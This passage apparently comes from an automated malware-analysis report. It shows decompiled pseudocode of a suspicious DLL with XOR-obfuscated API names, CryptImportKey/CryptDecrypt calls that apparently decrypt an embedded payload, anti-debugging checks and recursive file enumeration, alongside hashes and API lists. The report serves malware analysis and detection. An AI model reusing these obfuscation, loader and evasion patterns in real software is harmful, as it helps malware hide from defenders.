                					_t805 = _t805 + 0xc;
                				}
                				_t731 = 0;
                				_t544 =  &_v316;
                				if(_v316 != 0) {
                					do {
                						_t544 = _t544 + 1;
                						_t731 = _t731 + 1;
                					} while ( *_t544 != 0);
                				}
                				_t732 = _t731 + 1;
                				if(_t731 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v316, _t732);
                					_t805 = _t805 + 0xc;
                				}
                				_v300 = 0;
                				_v296 = 0x75fefcaf;
                				_v292 = 0x99ff5a1;
                				_v288 = 0x57c0ddca;
                				_v284 = 0x3bacb9e4;
                				if(_v300 == 0) {
                					_t780 = 0;
                					do {
                						 *(_t805 + 0x134 + _t780 * 4) =  *(_t805 + 0x134 + _t780 * 4) ^ 0x3bacb9e4;
                						_t780 = _t780 + 1;
                					} while (_t780 < 4);
                				}
                				_v552 = 0;
                				_v548 = 0x7973902d;
                				_v544 = 0x6c778723;
                				_v540 = 0x912f565;
                				if(_v552 == 0) {
                					_t779 = 0;
                					do {
                						 *(_t805 + 0x38 + _t779 * 4) =  *(_t805 + 0x38 + _t779 * 4) ^ 0x0912f565;
                						_t779 = _t779 + 1;
                					} while (_t779 < 3);
                				}
                				E6EA54050(_t795, "HeapFree", 0, 0x200);
                				_t733 = 0;
                				 *0x6ea9519c = 0;
                				_t806 = _t805 + 0xc;
                				_t548 =  &_v548;
                				if(_v548 != 0) {
                					do {
                						_t548 = _t548 + 1;
                						_t733 = _t733 + 1;
                					} while ( *_t548 != 0);
                				}
                				_t734 = _t733 + 1;
                				if(_t733 + 1 != 0) {
                					E6EA54940("HeapFree",  &_v548, _t734);
                					_t806 = _t806 + 0xc;
                				}
                				_t735 = 0;
                				_t549 =  &_v296;
                				if(_v296 != 0) {
                					do {
                						_t549 = _t549 + 1;
                						_t735 = _t735 + 1;
                					} while ( *_t549 != 0);
                				}
                				_t736 = _t735 + 1;
                				if(_t735 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v296, _t736);
                					_t806 = _t806 + 0xc;
                				}
                				_v280 = 0;
                				_v276 = 0x3a02ac00;
                				_v272 = 0x4663a50e;
                				_v268 = 0x183c8d65;
                				_v264 = 0x7450e94b;
                				if(_v280 == 0) {
                					_t778 = 0;
                					do {
                						 *(_t806 + 0x148 + _t778 * 4) =  *(_t806 + 0x148 + _t778 * 4) ^ 0x7450e94b;
                						_t778 = _t778 + 1;
                					} while (_t778 < 4);
                				}
                				_v536 = 0;
                				_v532 = 0x388142f5;
                				_v528 = 0x24a142ef;
                				_v524 = 0x488348d1;
                				if(_v536 == 0) {
                					_t777 = 0;
                					do {
                						 *(_t806 + 0x48 + _t777 * 4) =  *(_t806 + 0x48 + _t777 * 4) ^ 0x48e027bd;
                						_t777 = _t777 + 1;
                					} while (_t777 < 3);
                				}
                				E6EA54050(_t795, "HeapReAlloc", 0, 0x200);
                				_t737 = 0;
                				 *0x6ea953a0 = 0;
                				_t807 = _t806 + 0xc;
                				_t553 =  &_v532;
                				if(_v532 != 0) {
                					do {
                						_t553 = _t553 + 1;
                						_t737 = _t737 + 1;
                					} while ( *_t553 != 0);
                				}
                				_t738 = _t737 + 1;
                				if(_t737 + 1 != 0) {
                					E6EA54940("HeapReAlloc",  &_v532, _t738);
                					_t807 = _t807 + 0xc;
                				}
                				_t739 = 0;
                				_t554 =  &_v276;
                				if(_v276 != 0) {
                					do {
                						_t554 = _t554 + 1;
                						_t739 = _t739 + 1;
                					} while ( *_t554 != 0);
                				}
                				_t740 = _t739 + 1;
                				if(_t739 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v276, _t740);
                					_t807 = _t807 + 0xc;
                				}
                				_v260 = 0;
                				_v256 = 0x68cef9dd;
                				_v252 = 0x3b8bf4ec;
                				_v248 = 0x65d4f9b2;
                				_v244 = 0x9b89d9c;
                				if(_v260 == 0) {
                					_t776 = 0;
                					do {
                						 *(_t807 + 0x15c + _t776 * 4) =  *(_t807 + 0x15c + _t776 * 4) ^ 0x09b89d9c;
                						_t776 = _t776 + 1;
                					} while (_t776 < 4);
                				}
                				_v32 = 0;
                				_v28 = 0x1c7d48ae;
                				_v24 = 0x1d677b99;
                				_v20 = 0x9765398;
                				_v16 = 0x186a55ae;
                				_v12 = 0x2d704288;
                				_v8 = 0x6c043aed;
                				if(_v32 == 0) {
                					_t775 = 0;
                					asm("o16 nop [eax+eax]");
                					do {
                						 *(_t807 + 0x240 + _t775 * 4) =  *(_t807 + 0x240 + _t775 * 4) ^ 0x6c043aed;
                						_t775 = _t775 + 1;
                					} while (_t775 < 6);
                				}
                				E6EA54050(_t795, "CryptAcquireContextA", 0, 0x200);
                				_t741 = 0;
                				 *0x6ea955a4 = 0;
                				_t808 = _t807 + 0xc;
                				_t558 =  &_v28;
                				if(_v28 != 0) {
                					do {
                						_t558 = _t558 + 1;
                						_t741 = _t741 + 1;
                					} while ( *_t558 != 0);
                				}
                				_t742 = _t741 + 1;
                				if(_t741 + 1 != 0) {
                					E6EA54940("CryptAcquireContextA",  &_v28, _t742);
                					_t808 = _t808 + 0xc;
                				}
                				_t743 = 0;
                				_t559 =  &_v256;
                				if(_v256 != 0) {
                					do {
                						_t559 = _t559 + 1;
                						_t743 = _t743 + 1;
                					} while ( *_t559 != 0);
                				}
                				_t744 = _t743 + 1;
                				if(_t743 + 1 != 0) {
                					E6EA54940("Advapi32.dll",  &_v256, _t744);
                					_t808 = _t808 + 0xc;
                				}
                				_v220 = 0;
                				_v216 = 0x1b9fd39d;
                				_v212 = 0x48dadeac;
                				_v208 = 0x1685d3f2;
                				_v204 = 0x7ae9b7dc;
                				if(_v220 == 0) {
                					_t774 = 0;
                					do {
                						 *(_t808 + 0x184 + _t774 * 4) =  *(_t808 + 0x184 + _t774 * 4) ^ 0x7ae9b7dc;
                						_t774 = _t774 + 1;
                					} while (_t774 < 4);
                				}
                				_v240 = 0;
                				_v236 = 0x470a1e87;
                				_v232 = 0x471e25b0;
                				_v228 = 0x7c071eab;
                				_v224 = 0x377315a1;
                				if(_v240 == 0) {
                					_t773 = 0;
                					do {
                						 *(_t808 + 0x170 + _t773 * 4) =  *(_t808 + 0x170 + _t773 * 4) ^ 0x37736cc4;
                						_t773 = _t773 + 1;
                					} while (_t773 < 4);
                				}
                				E6EA54050(_t795, "CryptImportKey", 0, 0x200);
                				_t745 = 0;
                				 *0x6ea957a8 = 0;
                				_t809 = _t808 + 0xc;
                				_t563 =  &_v236;
                				if(_v236 != 0) {
                					asm("o16 nop [eax+eax]");
                					do {
                						_t563 = _t563 + 1;
                						_t745 = _t745 + 1;
                					} while ( *_t563 != 0);
                				}
                				_t746 = _t745 + 1;
                				if(_t745 + 1 != 0) {
                					E6EA54940("CryptImportKey",  &_v236, _t746);
                					_t809 = _t809 + 0xc;
                				}
                				_t747 = 0;
                				_t564 =  &_v216;
                				if(_v216 != 0) {
                					do {
                						_t564 = _t564 + 1;
                						_t747 = _t747 + 1;
                					} while ( *_t564 != 0);
                				}
                				_t748 = _t747 + 1;
                				if(_t747 + 1 != 0) {
                					E6EA54940("Advapi32.dll",  &_v216, _t748);
                					_t809 = _t809 + 0xc;
                				}
                				_v200 = 0;
                				_v196 = 0x5ae04b85;
                				_v192 = 0x29a546b4;
                				_v188 = 0x77fa4bea;
                				_v184 = 0x1b962fc4;
                				if(_v200 == 0) {
                					_t772 = 0;
                					do {
                						 *(_t809 + 0x198 + _t772 * 4) =  *(_t809 + 0x198 + _t772 * 4) ^ 0x1b962fc4;
                						_t772 = _t772 + 1;
                					} while (_t772 < 4);
                				}
                				_v80 = 0;
                				_v76 = 0x765cbec6;
                				_v72 = 0x72409ff1;
                				_v68 = 0x565ca9ce;
                				_v64 = 0x6b44bee4;
                				_v60 = 0x625cc85;
                				if(_v80 == 0) {
                					_t771 = 0;
                					do {
                						 *(_t809 + 0x210 + _t771 * 4) =  *(_t809 + 0x210 + _t771 * 4) ^ 0x0625cc85;
                						_t771 = _t771 + 1;
                					} while (_t771 < 5);
                				}
                				E6EA54050(_t795, "CryptSetKeyParam", 0, 0x200);
                				_t749 = 0;
                				 *0x6ea959ac = 0;
                				_t810 = _t809 + 0xc;
                				_t568 =  &_v76;
                				if(_v76 != 0) {
                					do {
                						_t568 = _t568 + 1;
                						_t749 = _t749 + 1;
                					} while ( *_t568 != 0);
                				}
                				_t750 = _t749 + 1;
                				if(_t749 + 1 != 0) {
                					E6EA54940("CryptSetKeyParam",  &_v76, _t750);
                					_t810 = _t810 + 0xc;
                				}
                				_t751 = 0;
                				_t569 =  &_v196;
                				if(_v196 != 0) {
                					do {
                						_t569 = _t569 + 1;
                						_t751 = _t751 + 1;
                					} while ( *_t569 != 0);
                				}
                				_t752 = _t751 + 1;
                				if(_t751 + 1 != 0) {
                					E6EA54940("AdvApi32.dll",  &_v196, _t752);
                					_t810 = _t810 + 0xc;
                				}
                				_v160 = 0;
                				_v156 = 0x4c7b3bc5;
                				_v152 = 0x1f3e36f4;
                				_v148 = 0x41613baa;
                				_v144 = 0x2d0d5f84;
                				if(_v160 == 0) {
                					_t770 = 0;
                					do {
                						 *(_t810 + 0x1c0 + _t770 * 4) =  *(_t810 + 0x1c0 + _t770 * 4) ^ 0x2d0d5f84;
                						_t770 = _t770 + 1;
                					} while (_t770 < 4);
                				}
                				_v180 = 0;
                				_v176 = 0x51609e9f;
                				_v172 = 0x427ca8a8;
                				_v168 = 0x556995ae;
                				_v164 = 0x2119ecdc;
                				if(_v180 == 0) {
                					_t769 = 0;
                					do {
                						 *(_t810 + 0x1ac + _t769 * 4) =  *(_t810 + 0x1ac + _t769 * 4) ^ 0x2119ecdc;
                						_t769 = _t769 + 1;
                					} while (_t769 < 4);
                				}
                				E6EA54050(_t795, "CryptDecrypt", 0, 0x200);
                				_t753 = 0;
                				 *0x6ea95bb0 = 0;
                				_t811 = _t810 + 0xc;
                				_t573 =  &_v176;
                				if(_v176 != 0) {
                					asm("o16 nop [eax+eax]");
                					do {
                						_t573 = _t573 + 1;
                						_t753 = _t753 + 1;
                					} while ( *_t573 != 0);
                				}
                				_t754 = _t753 + 1;
                				if(_t753 + 1 != 0) {
                					E6EA54940("CryptDecrypt",  &_v176, _t754);
                					_t811 = _t811 + 0xc;
                				}
                				_t755 = 0;
                				_t574 =  &_v156;
                				if(_v156 != 0) {
                					do {
                						_t574 = _t574 + 1;
                						_t755 = _t755 + 1;
                					} while ( *_t574 != 0);
                				}
                				_t756 = _t755 + 1;
                				if(_t755 + 1 != 0) {
                					E6EA54940("Advapi32.dll",  &_v156, _t756);
                					_t811 = _t811 + 0xc;
                				}
                				_v120 = 0;
                				_v116 = 0x68e570aa;
                				_v112 = 0x3ba07d9b;
                				_v108 = 0x65ff70c5;
                				_v104 = 0x99314eb;
                				if(_v120 == 0) {
                					_t768 = 0;
                					do {
                						 *(_t811 + 0x1e8 + _t768 * 4) =  *(_t811 + 0x1e8 + _t768 * 4) ^ 0x099314eb;
                						_t768 = _t768 + 1;
                					} while (_t768 < 4);
                				}
                				_v140 = 0;
                				_v136 = 0x3880a15e;
                				_v132 = 0x3b9c9769;
                				_v128 = 0x3196a169;
                				_v124 = 0x4880b656;
                				if(_v140 == 0) {
                					_t767 = 0;
                					do {
                						 *(_t811 + 0x1d4 + _t767 * 4) =  *(_t811 + 0x1d4 + _t767 * 4) ^ 0x48f9d31d;
                						_t767 = _t767 + 1;
                					} while (_t767 < 4);
                				}
                				E6EA54050(_t795, "CryptDestroyKey", 0, 0x200);
                				_t757 = 0;
                				 *0x6ea95db4 = 0;
                				_t812 = _t811 + 0xc;
                				_t578 =  &_v136;
                				if(_v136 != 0) {
                					asm("o16 nop [eax+eax]");
                					do {
                						_t578 = _t578 + 1;
                						_t757 = _t757 + 1;
                					} while ( *_t578 != 0);
                				}
                				_t758 = _t757 + 1;
                				if(_t757 + 1 != 0) {
                					E6EA54940("CryptDestroyKey",  &_v136, _t758);
                					_t812 = _t812 + 0xc;
                				}
                				_t759 = 0;
                				_t579 =  &_v116;
                				if(_v116 != 0) {
                					do {
                						_t579 = _t579 + 1;
                						_t759 = _t759 + 1;
                					} while ( *_t579 != 0);
                				}
                				_t760 = _t759 + 1;
                				if(_t759 + 1 != 0) {
                					E6EA54940("Advapi32.dll",  &_v116, _t760);
                					_t812 = _t812 + 0xc;
                				}
                				_v100 = 0;
                				_v96 = 0x63d054a3;
                				_v92 = 0x30955992;
                				_v88 = 0x6eca54cc;
                				_v84 = 0x2a630e2;
                				if(_v100 == 0) {
                					_t766 = 0;
                					do {
                						 *(_t812 + 0x1fc + _t766 * 4) =  *(_t812 + 0x1fc + _t766 * 4) ^ 0x02a630e2;
                						_t766 = _t766 + 1;
                					} while (_t766 < 4);
                				}
                				_v56 = 0;
                				_v52 = 0x673b220d;
                				_v48 = 0x7b27023a;
                				_v44 = 0x7231312b;
                				_v40 = 0x632c3f0d;
                				_v36 = 0x1736282b;
                				if(_v56 == 0) {
                					_t765 = 0;
                					do {
                						 *(_t812 + 0x228 + _t765 * 4) =  *(_t812 + 0x228 + _t765 * 4) ^ 0x1742504e;
                						_t765 = _t765 + 1;
                					} while (_t765 < 5);
                				}
                				E6EA54050(_t795, "CryptReleaseContext", 0, 0x200);
                				_t761 = 0;
                				 *0x6ea95fb8 = 0;
                				_t813 = _t812 + 0xc;
                				_t583 =  &_v52;
                				if(_v52 != 0) {
                					do {
                						_t583 = _t583 + 1;
                						_t761 = _t761 + 1;
                					} while ( *_t583 != 0);
                				}
                				_t762 = _t761 + 1;
                				if(_t761 + 1 != 0) {
                					E6EA54940("CryptReleaseContext",  &_v52, _t762);
                					_t813 = _t813 + 0xc;
                				}
                				_t763 = 0;
                				_t584 =  &_v96;
                				if(_v96 != 0) {
                					do {
                						_t584 = _t584 + 1;
                						_t763 = _t763 + 1;
                					} while ( *_t584 != 0);
                				}
                				_t764 = _t763 + 1;
                				if(_t763 + 1 != 0) {
                					return E6EA54940("Advapi32.dll",  &_v96, _t764);
                				}
                				return _t584;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: ";g$?,c$ OtHeapAlloc$ UtHeapReAlloc$+11r$AdvApi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptImportKey$CryptReleaseContext$CryptSetKeyParam$GetProcessHeap$HeapFree$HeapSize$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KPt$VirtualAlloc$VirtualFree$VirtualProtect$`gtVirtualQuery
                • API String ID: 0-1127669070
                • Opcode ID: 9d141ec795013e08234eb0469c666f7b066a0426203a0f62340dee20113a67d1
                • Instruction ID: a4b4336dc13662d03246fb910787eb2ef0760a5f00d3da40040c7939b90a983c
                • Opcode Fuzzy Hash: 9d141ec795013e08234eb0469c666f7b066a0426203a0f62340dee20113a67d1
                • Instruction Fuzzy Hash: BEA2C0B041C3809EE375DF54E495BFBBBE4BB92308F19486DD1DA4B342E73184988B5A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,00000000,00000002,00000000), ref: 6EA523C7
                • CryptImportKey.ADVAPI32(00000000,00000208,0000002C,00000000,00000001,00000000), ref: 6EA523E2
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: Crypt$AcquireContextImport
                • String ID: $cfhelxslqkzlhbfx$dlynyldiboesrvwplmwozrwmuhoxjmyn
                • API String ID: 193843291-431830275
                • Opcode ID: 572058e0342ae6734390dda27a3fb22f0c0fa324548b3a6e68725a711670933c
                • Instruction ID: 03fd06bfb19c13d5e82999d2beea7861e9972bfd9b48b4ccaf246c6030712239
                • Opcode Fuzzy Hash: 572058e0342ae6734390dda27a3fb22f0c0fa324548b3a6e68725a711670933c
                • Instruction Fuzzy Hash: 2F61A131E042499FEF24CFA8C8917EDBBB4BF49300F148169E655E7381DB7159858F64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E6EA56B21(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				char _v0;
                				signed int _v8;
                				intOrPtr _v524;
                				intOrPtr _v528;
                				void* _v532;
                				intOrPtr _v536;
                				char _v540;
                				intOrPtr _v544;
                				intOrPtr _v548;
                				intOrPtr _v552;
                				intOrPtr _v556;
                				intOrPtr _v560;
                				intOrPtr _v564;
                				intOrPtr _v568;
                				intOrPtr _v572;
                				intOrPtr _v576;
                				intOrPtr _v580;
                				intOrPtr _v584;
                				char _v724;
                				intOrPtr _v792;
                				intOrPtr _v800;
                				char _v804;
                				struct _EXCEPTION_POINTERS _v812;
                				signed int _t40;
                				char* _t47;
                				char* _t49;
                				intOrPtr _t61;
                				intOrPtr _t62;
                				intOrPtr _t66;
                				intOrPtr _t67;
                				int _t68;
                				intOrPtr _t69;
                				signed int _t70;
                
                				_t69 = __esi;
                				_t67 = __edi;
                				_t66 = __edx;
                				_t61 = __ebx;
                				_t40 =  *0x6ea93004; // 0x90a7628e
                				_t41 = _t40 ^ _t70;
                				_v8 = _t40 ^ _t70;
                				if(_a4 != 0xffffffff) {
                					_push(_a4);
                					E6EA53BB6(_t41);
                					_pop(_t62);
                				}
                				E6EA54050(_t67,  &_v804, 0, 0x50);
                				E6EA54050(_t67,  &_v724, 0, 0x2cc);
                				_v812.ExceptionRecord =  &_v804;
                				_t47 =  &_v724;
                				_v812.ContextRecord = _t47;
                				_v548 = _t47;
                				_v552 = _t62;
                				_v556 = _t66;
                				_v560 = _t61;
                				_v564 = _t69;
                				_v568 = _t67;
                				_v524 = ss;
                				_v536 = cs;
                				_v572 = ds;
                				_v576 = es;
                				_v580 = fs;
                				_v584 = gs;
                				asm("pushfd");
                				_pop( *_t22);
                				_v540 = _v0;
                				_t49 =  &_v0;
                				_v528 = _t49;
                				_v724 = 0x10001;
                				_v544 =  *((intOrPtr*)(_t49 - 4));
                				_v804 = _a8;
                				_v800 = _a12;
                				_v792 = _v0;
                				_t68 = IsDebuggerPresent();
                				SetUnhandledExceptionFilter(0);
                				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                					_push(_a4);
                					E6EA53BB6(_t57);
                				}
                				return E6EA53252(_v8 ^ _t70);
                			}

                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EA56C19
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EA56C23
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EA56C30
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 285b7cd8ad522616231c5cd0cfec02f56cedd6e9e1f61fcb3418be083132947e
                • Instruction ID: aa65ed4f7ee46fe4ac2e929022af6a50c51f6e8ac66dfd124c23e0845cacda91
                • Opcode Fuzzy Hash: 285b7cd8ad522616231c5cd0cfec02f56cedd6e9e1f61fcb3418be083132947e
                • Instruction Fuzzy Hash: CE31C2749113189BCB21DF64D988BCDBBB8BF48311F5045EAE81CA6350EB309F958F48
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA55900(int _a4) {
                				void* _t14;
                				void* _t16;
                
                				if(E6EA56AEE(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                					TerminateProcess(GetCurrentProcess(), _a4);
                				}
                				E6EA55986(_t14, _t16, _a4);
                				ExitProcess(_a4);
                			}






                APIs
                • GetCurrentProcess.KERNEL32(?,?,6EA558FF,?,00000001,?,?), ref: 6EA55922
                • TerminateProcess.KERNEL32(00000000,?,6EA558FF,?,00000001,?,?), ref: 6EA55929
                • ExitProcess.KERNEL32 ref: 6EA5593B
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 486afefffa599dffdd84be1169b71baf8766bfdb46a012906720ce7c7202ab2d
                • Instruction ID: bb2825b006361334df04575d942c8b9159be822294ab9243d98de4ff156fe7d5
                • Opcode Fuzzy Hash: 486afefffa599dffdd84be1169b71baf8766bfdb46a012906720ce7c7202ab2d
                • Instruction Fuzzy Hash: 55E04631050608EFCF116FA0CD08A493B29FB45262B018814F9059E220CB39DCA2DA54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E6EA57045(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				signed int _v12;
                				intOrPtr* _v32;
                				CHAR* _v36;
                				signed int _v48;
                				intOrPtr _v286;
                				signed int _v287;
                				struct _WIN32_FIND_DATAA _v332;
                				intOrPtr* _v336;
                				signed int _v340;
                				signed int _v344;
                				intOrPtr _v372;
                				intOrPtr _t40;
                				void* _t45;
                				signed int _t47;
                				intOrPtr _t49;
                				signed char _t50;
                				intOrPtr* _t58;
                				union _FINDEX_INFO_LEVELS _t60;
                				int _t65;
                				intOrPtr _t75;
                				signed char _t78;
                				void* _t80;
                				void* _t83;
                				intOrPtr _t84;
                				union _FINDEX_INFO_LEVELS _t85;
                				intOrPtr _t88;
                				intOrPtr* _t91;
                				intOrPtr _t93;
                				void* _t95;
                				intOrPtr* _t96;
                				signed int _t100;
                				void* _t110;
                				intOrPtr _t111;
                				signed int _t114;
                				CHAR* _t116;
                				intOrPtr _t121;
                				void* _t122;
                				signed char _t124;
                				void* _t128;
                				signed int _t129;
                				void* _t130;
                				void* _t131;
                
                				_push(__ecx);
                				_t91 = _a4;
                				_t2 = _t91 + 1; // 0x1
                				_t110 = _t2;
                				do {
                					_t40 =  *_t91;
                					_t91 = _t91 + 1;
                				} while (_t40 != 0);
                				_push(__edi);
                				_t114 = _a12;
                				_t93 = _t91 - _t110 + 1;
                				_v8 = _t93;
                				if(_t93 <=  !_t114) {
                					_push(__ebx);
                					_push(__esi);
                					_t5 = _t114 + 1; // 0x1
                					_t83 = _t5 + _t93;
                					_t121 = E6EA56DB6(_t93, _t83, 1);
                					_pop(_t95);
                					if(_t114 == 0) {
                						L6:
                						_push(_v8);
                						_t83 = _t83 - _t114;
                						_t45 = E6EA59795(_t95, _t121 + _t114, _t83, _a4);
                						_t129 = _t128 + 0x10;
                						if(_t45 != 0) {
                							goto L12;
                						} else {
                							_t88 = _a16;
                							_t75 = E6EA57278(_t88);
                							_v8 = _t75;
                							if(_t75 == 0) {
                								 *((intOrPtr*)( *((intOrPtr*)(_t88 + 4)))) = _t121;
                								_t124 = 0;
                								 *((intOrPtr*)(_t88 + 4)) =  *((intOrPtr*)(_t88 + 4)) + 4;
                							} else {
                								E6EA56E13(_t121);
                								_t124 = _v8;
                							}
                							E6EA56E13(0);
                							_t78 = _t124;
                							goto L11;
                						}
                					} else {
                						_push(_t114);
                						_t80 = E6EA59795(_t95, _t121, _t83, _a8);
                						_t129 = _t128 + 0x10;
                						if(_t80 != 0) {
                							L12:
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							E6EA56CF6();
                							asm("int3");
                							_t127 = _t129;
                							_t130 = _t129 - 0x150;
                							_t47 =  *0x6ea93004; // 0x90a7628e
                							_v48 = _t47 ^ _t129;
                							_t96 = _v32;
                							_push(_t83);
                							_t84 = _v332.cAlternateFileName;
                							_push(0);
                							_t116 = _v36;
                							_v372 = _t84;
                							while(_t96 != _t116) {
                								_t49 =  *_t96;
                								if(_t49 != 0x2f && _t49 != 0x5c && _t49 != 0x3a) {
                									_t96 = E6EA597E0(_t116, _t96);
                									continue;
                								}
                								break;
                							}
                							_t111 =  *_t96;
                							if(_t111 != 0x3a || _t96 ==  &(_t116[1])) {
                								_t85 = 0;
                								if(_t111 == 0x2f || _t111 == 0x5c) {
                									L25:
                									_t50 = 1;
                								} else {
                									_t50 = 0;
                									if(_t111 == 0x3a) {
                										goto L25;
                									}
                								}
                								_t98 = _t96 - _t116 + 1;
                								_push(_t121);
                								asm("sbb eax, eax");
                								_v340 =  ~(_t50 & 0x000000ff) & _t96 - _t116 + 0x00000001;
                								E6EA54050(_t116,  &_v332, _t85, 0x140);
                								_t131 = _t130 + 0xc;
                								_t122 = FindFirstFileExA(_t116, _t85,  &_v332, _t85, _t85, _t85);
                								_t58 = _v336;
                								if(_t122 != 0xffffffff) {
                									_t100 =  *((intOrPtr*)(_t58 + 4)) -  *_t58;
                									_t101 = _t100 >> 2;
                									_v344 = _t100 >> 2;
                									do {
                										if(_v332.cFileName != 0x2e) {
                											L38:
                											_push(_t58);
                											_t60 = E6EA57045(_t85, _t101, _t116, _t122,  &(_v332.cFileName), _t116, _v340);
                											_t131 = _t131 + 0x10;
                											if(_t60 != 0) {
                												goto L28;
                											} else {
                												goto L39;
                											}
                										} else {
                											_t101 = _v287;
                											if(_t101 == 0 || _t101 == 0x2e && _v286 == _t85) {
                												goto L39;
                											} else {
                												goto L38;
                											}
                										}
                										goto L42;
                										L39:
                										_t65 = FindNextFileA(_t122,  &_v332);
                										_t58 = _v336;
                									} while (_t65 != 0);
                									_t112 =  *_t58;
                									_t104 = _v344;
                									_t68 =  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2;
                									if(_v344 !=  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2) {
                										E6EA592A0(_t85, _t116, _t122, _t112 + _t104 * 4, _t68 - _t104, 4, E6EA56E4D);
                									}
                								} else {
                									_push(_t58);
                									_t60 = E6EA57045(_t85, _t98, _t116, _t122, _t116, _t85, _t85);
                									L28:
                									_t85 = _t60;
                								}
                								if(_t122 != 0xffffffff) {
                									FindClose(_t122);
                								}
                							} else {
                								_push(_t84);
                								E6EA57045(0, _t96, _t116, _t121, _t116, 0, 0);
                							}
                							return E6EA53252(_v12 ^ _t127);
                						} else {
                							goto L6;
                						}
                					}
                				} else {
                					_t78 = 0xc;
                					L11:
                					return _t78;
                				}
                				L42:
                			}















































                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: 5ae35d6892b592ea6c00955ad63f9387b2fd43e4afaf23a18c1046b75ed894ee
                • Instruction ID: 9d63bb72b144e76de9e38391a751a6ce3c28f690d99e91b192987c485c369b93
                • Opcode Fuzzy Hash: 5ae35d6892b592ea6c00955ad63f9387b2fd43e4afaf23a18c1046b75ed894ee
                • Instruction Fuzzy Hash: A13126B1900209AFDB14CEB8CC94EFB7BBDEB85308F148198F959A7391E6309DD58B54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA5C678(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                				signed int _t172;
                				signed int _t175;
                				signed int _t178;
                				signed int* _t179;
                				signed int _t195;
                				signed int _t199;
                				signed int _t202;
                				void* _t203;
                				void* _t206;
                				signed int _t209;
                				void* _t210;
                				signed int _t225;
                				unsigned int* _t240;
                				signed char _t242;
                				signed int* _t250;
                				unsigned int* _t256;
                				signed int* _t257;
                				signed char _t259;
                				long _t262;
                				signed int* _t265;
                
                				 *(_a4 + 4) = 0;
                				_t262 = 0xc000000d;
                				 *(_a4 + 8) = 0;
                				 *(_a4 + 0xc) = 0;
                				_t242 = _a12;
